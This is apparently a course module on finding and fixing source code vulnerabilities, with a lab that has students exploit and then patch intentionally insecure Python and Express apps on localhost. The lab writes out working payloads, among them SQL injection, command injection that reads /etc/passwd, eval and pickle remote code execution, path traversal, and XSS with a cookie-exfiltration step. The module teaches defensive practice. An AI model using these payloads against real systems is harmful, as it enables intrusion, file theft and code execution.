Source Code Vulnerability Management

Objectives: By the end of this topic, you will be able to…

Detect common vulnerabilities in real source code

Use static analysis tools to automate code review

Apply critical thinking to interpret and validate findings

Exploit confirmed vulnerabilities to demonstrate their real-world impact

Propose secure improvements to the code and verify they eliminate the attack vector

What is a vulnerability in code?

A source code vulnerability is a weakness in the logic or implementation of software that can be exploited to compromise its confidentiality, integrity, or availability. These flaws may allow an attacker to execute malicious code, access sensitive information, or alter the system’s behavior.

Main causes of vulnerabilities

Logical errors occur when the program’s logic does not account for all scenarios — for example, checking that a user is authenticated but not verifying their role before performing a sensitive action. These flaws require careful reading of intent and are often missed by automated tools.

Lack of input validation allows uncontrolled user data to reach critical functions, causing injections, logic failures, or leaks. The most common example is constructing SQL queries by concatenating strings:

# Vulnerable: attacker supplies username = "' OR '1'='1" to dump the whole table
query = "SELECT * FROM users WHERE username = '" + username + "'"
cursor.execute(query)
 
# Safe: parameterized query — the database never interprets user input as SQL
cursor.execute("SELECT * FROM users WHERE username = ?", (username,))

Use of insecure functions introduces risk because some standard library functions perform no bounds checking. The classic case in C is strcpy, which writes until it hits a null byte regardless of the destination buffer size:

/* Vulnerable: overwrites adjacent memory if src is longer than 63 chars */
char dest[64];
strcpy(dest, src);
 
/* Safe: limits the copy to n-1 bytes */
strncpy(dest, src, sizeof(dest) - 1);
dest[sizeof(dest) - 1] = '\0';

Insecure credential management exposes secrets by embedding them directly in source code, where they end up in version control and are visible to anyone with repository access:

# Vulnerable: secret committed to the repository
DB_PASSWORD = "hunter2"
 
# Safe: read from the environment at runtime — never stored in code
import os
DB_PASSWORD = os.environ.get("DB_PASSWORD")

Access control errors arise when code confuses authentication (confirming who the user is) with authorization (confirming what they are allowed to do). A common mistake is fetching a resource by a user-supplied ID without checking that the requester owns it:

# Vulnerable: any logged-in user can read any record by guessing its ID
def get_record(user_id, record_id):
    return db.query("SELECT * FROM records WHERE id = ?", (record_id,))
 
# Safe: verify ownership before returning data
def get_record(user_id, record_id):
    record = db.query("SELECT * FROM records WHERE id = ?", (record_id,))
    if record.owner_id != user_id:
        raise PermissionError("Access denied")
    return record

Relevant OWASP Top 10 categories

The OWASP Top 10 lists the most critical web application vulnerabilities. Those most related to source code:

Category	Description	Example
A01 — Broken Access Control	Unauthorized access to functions or data	IDOR (Insecure Direct Object Reference)
A03 — Injection	SQL, OS command, or other injection	Inadequate input validation
A07 — Auth Failures	Authentication or session management failures	Token reuse, weak passwords
A08 — Integrity Failures	Using compromised dependencies without verification	Libraries without hash checks
A09 — Logging Failures	Not logging relevant events	Ongoing attacks undetected
A10 — SSRF	User-controlled destination in outbound requests	Internal network scanning

Static vs dynamic analysis

SAST (Static Application Security Testing)

SAST is performed without executing the program — it examines source or binary code directly, looking for risky patterns such as injections, information leaks, input validation errors, and insecure functions. Its main advantage is that it integrates naturally into CI/CD pipelines, catching flaws early when remediation is cheap. Its limitation is that it can generate false positives and cannot verify behavior that only emerges at runtime.

Dynamic analysis (DAST or IAST)

Dynamic analysis runs the application and observes its actual behavior — making it useful for detecting vulnerabilities that only manifest at runtime, such as race conditions or logic flaws that depend on application state. It complements static analysis rather than replacing it.

SAST tools

Tool	Language	Description
`Bandit`	Python	Reviews code for insecure practices
`Semgrep`	Multi-language	Lightweight, customizable pattern detection
`Flawfinder`	C/C++	Classic tool for insecure function detection
`SonarQube`	Multi-language	Supports custom rules, quality + security
`CodeQL`	Multi-language	Complex pattern queries on code (GitHub)
`Brakeman`	Ruby on Rails	Analysis for Rails applications
`ESLint + Security Plugins`	JavaScript/TypeScript	Security-focused linting

These tools are often integrated into CI/CD pipelines to automatically scan code on each commit or pull request.

Interpreting and validating findings

Not all findings represent a real risk: the first step is to prioritize by severity and context, evaluating whether the vulnerable code is actually reachable by untrusted input. Next, assess reproducibility — can the finding be exploited, and under what conditions? Tracing the data flow from input to the vulnerable function helps confirm whether validation is truly absent. When a genuine flaw is confirmed, apply secure coding principles to fix it without breaking surrounding logic. Finally, document every finding thoroughly so it can be reviewed, corrected, and used as a learning reference by the team.

Hands-on lab

Requirements: Kali Linux, bandit, semgrep, Node.js

Part 0: Setting up the lab

# Install pipx
sudo apt install pipx
 
# Install scanner tools
pipx install bandit semgrep

Create a Semgrep account at semgrep.dev using your GitHub account.

Part 1: Python CLI tool

You are given insecure_script.py, a small Python backend utility. Your workflow for this part is: scan → exploit → patch → verify.

Step 1 — Scan. Run Bandit and save the full report:

bandit -r insecure_script.py 2>&1 | tee bandit_before.txt

For every HIGH and MEDIUM severity finding, record the line number, the Bandit rule ID, and what you think the risk is — before reading the code in depth.

Step 2 — Exploit. Run the script and work through each prompt. Do not change any code yet. Your goal is to confirm which findings represent real, triggerable vulnerabilities.

python3 insecure_script.py

User lookup — SQL injection: At the username prompt, enter ' OR '1'='1' --. Count the records returned and compare them to what a legitimate user should see. What did the injected condition do to the WHERE clause?

Network ping — command injection: Enter 127.0.0.1; whoami at the host prompt. The semicolon ends the ping command and starts a new shell command. Then try 127.0.0.1; cat /etc/passwd to read a system file. Screenshot the output.

Calculator — arbitrary code execution via eval: Enter __import__('os').system('id'). The function receives your input as a string and executes it as Python code. Record what the output reveals about the process running the script.

Session loader — pickle deserialization RCE: Pickle can encode arbitrary Python objects, including ones that run a system command when deserialized. In a separate terminal, generate a malicious payload:

python3 -c "
import pickle, os, base64
 
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('id',))
 
print(base64.b64encode(pickle.dumps(Exploit())).decode())
"

Paste the output at the session loader prompt and observe the command execute before load_session returns.

One-time tokens — insecure randomness: The script prints five tokens generated by random.randint. Note the approximate time. Then run the following to reproduce the same sequence:

python3 -c "
import random, time
random.seed(int(time.time()))
for _ in range(5):
    print(random.randint(100000, 999999))
"

random is seeded by the system clock, so an attacker who knows the generation time can predict every token issued during that second.

Hardcoded credentials — static finding: The remaining Bandit findings flag constants assigned at module level. No runtime interaction is needed — their presence in the source file means they will appear in every git commit, log, and deployment artefact. Document what each credential controls and what an attacker could do with it.

Step 3 — Patch. Fix every HIGH and MEDIUM finding. Use the table below as a guide, then write the secure version yourself:

Vulnerability	Secure pattern
SQL injection	Parameterized queries: `cursor.execute(query, (param,))`
Command injection	Pass arguments as a list, no `shell=True`: `subprocess.check_output(["ping", "-c", "1", host])`
`eval` / `exec`	Remove or replace; use `ast.literal_eval` only for safe literal parsing
Pickle deserialization	Use `json` for untrusted data
Hardcoded credentials	`os.environ.get("VAR_NAME")` — never store secrets in source code
Weak password hash	`bcrypt` or `argon2` for passwords; `hashlib.sha256` for non-secret digests
Insecure random	`secrets.token_hex()` or `secrets.randbelow()` for security-sensitive values

Add a short comment to every line you change explaining what you fixed and why.

Step 4 — Verify. Rerun Bandit — it should report zero HIGH or MEDIUM findings. Then rerun the script and attempt each exploit again. Every attack should now either raise an error or produce no useful output.

bandit -r insecure_script.py 2>&1 | tee bandit_after.txt
python3 insecure_script.py

Question

Which finding was hardest to exploit — and which was hardest to patch correctly? Did exploiting them change the order in which you prioritized the fixes?

Part 2: Node.js web application

You are given a small Express application in nodejs-app/. Your workflow is the same: scan → exploit → patch → verify.

Step 1 — Deploy and scan.

cd nodejs-app
npm install
npm start &    # runs on http://localhost:3000
semgrep --config=auto app.js 2>&1 | tee semgrep_before.txt

For each Semgrep finding, record the line, the rule ID, the affected endpoint, and your hypothesis about how it could be exploited.

Step 2 — Exploit. With the server running, attack every endpoint. Screenshot or save the output of each successful exploit before changing any code.

Hardcoded secrets — static finding: Locate the constants Semgrep flags near the top of app.js. Describe what an attacker who reads the source (or who obtains a leaked build artefact) could do with each value.

Reflected XSS — GET /hello: Open a browser and navigate to:

http://localhost:3000/hello?name=<script>alert(document.cookie)</script>

Observe the script execute. Now craft a payload that exfiltrates the page’s cookies to an external endpoint — use Webhook.site to receive the request and confirm the data arrived.

SQL injection — GET /user:

# Return every row in the users table
curl -G --data-urlencode "username=' OR '1'='1" http://localhost:3000/user
 
# Target the admin record specifically
curl -G --data-urlencode "username=admin'--" http://localhost:3000/user

Compare what you receive to what the endpoint is supposed to return for a normal request.

Path traversal — GET /file:

curl -G --data-urlencode "name=../../../../etc/passwd" http://localhost:3000/file
curl -G --data-urlencode "name=../../../../etc/hostname" http://localhost:3000/file

How far outside the intended directory can you navigate? What limits you?

Command injection — GET /ping:

curl -G --data-urlencode "host=127.0.0.1; id" http://localhost:3000/ping
curl -G --data-urlencode "host=127.0.0.1; cat /etc/passwd" http://localhost:3000/ping

IDOR — GET /note:

curl "http://localhost:3000/note?id=1"

No authentication is required. What does this mean for a multi-user application where notes are supposed to be private?

Credentials in URL — GET /login:

curl "http://localhost:3000/login?username=admin&password=admin123"

Switch to the terminal running npm start and find the request in the access log. Explain why GET parameters are a poor choice for credentials even when HTTPS is in use.

eval RCE — GET /calc:

curl -G --data-urlencode "expr=require('child_process').execSync('id').toString()" http://localhost:3000/calc
curl -G --data-urlencode "expr=require('fs').readFileSync('/etc/passwd','utf8')" http://localhost:3000/calc

Missing security headers:

curl -I http://localhost:3000/hello

Note which headers are absent. Look up what each missing header protects against and how the reflected XSS exploit from earlier could be partially mitigated by a correct Content-Security-Policy.

Step 3 — Patch. Fix every finding in app.js:

Vulnerability	Secure pattern
Hardcoded secrets	`process.env.VAR_NAME`; document required variables in a `.env.example` file
Reflected XSS	Escape user input before inserting it into HTML; add a `Content-Security-Policy` header
SQL injection	Parameterized queries using `?` placeholders: `db.get(query, [param], callback)`
Path traversal	`path.resolve()` the final path and assert it starts with the allowed directory
Command injection	Use `execFile` with an argument array instead of `exec` with a shell string
IDOR	Require authentication; verify the authenticated user owns the requested resource
Credentials in URL	Accept credentials via POST body only; never read passwords from query parameters
`eval` RCE	Remove the endpoint; if a calculator is needed, use a safe math parser library
Missing headers	`app.use(require('helmet')())` as the first middleware

Step 4 — Verify. Stop the server, restart with the patched code, and rerun Semgrep:

pkill -f "node app.js"
npm start &
semgrep --config=auto app.js 2>&1 | tee semgrep_after.txt

Rerun every curl command and browser request from Step 2. Each attack must either be rejected with an appropriate error or return sanitized output. Capture a screenshot for each one.

Question

Which vulnerability in the web application had the largest gap between how simple it was to exploit and how much damage it could cause in a real deployment? How did your answer change after you ran the exploit versus when you only read the Semgrep finding?

Cleanup

pkill -f "node app.js"

Submission

Compressed folder including:

bandit_before.txt and bandit_after.txt
semgrep_before.txt and semgrep_after.txt
Terminal output or screenshots for every successful exploit (before patching)
Patched insecure_script.py and app.js with explanatory comments on every changed line
Written reflection (max. 1 page): which vulnerability surprised you most once you exploited it, and why

Key concepts

Term	Definition
SAST	Source code analysis without executing the application
Vulnerability	Exploitable weakness in a system or application
SQLi	Injection of malicious SQL code into input fields
XSS	Injection of malicious scripts into web pages
Bandit	SAST tool for Python code
Semgrep	Multi-language and customizable static analyzer
OWASP Top 10	List of the ten most critical web vulnerabilities

Navigation: ← Previous | Home | Next →

Quartz 4

Explorer

08 - Source Code Vulnerability Management

Source Code Vulnerability Management

What is a vulnerability in code?

Main causes of vulnerabilities

Relevant OWASP Top 10 categories

Static vs dynamic analysis

SAST (Static Application Security Testing)

Dynamic analysis (DAST or IAST)

SAST tools

Interpreting and validating findings

Hands-on lab

Part 0: Setting up the lab

Part 1: Python CLI tool

Part 2: Node.js web application

Cleanup

Submission

Key concepts

Graph View

Table of Contents

Backlinks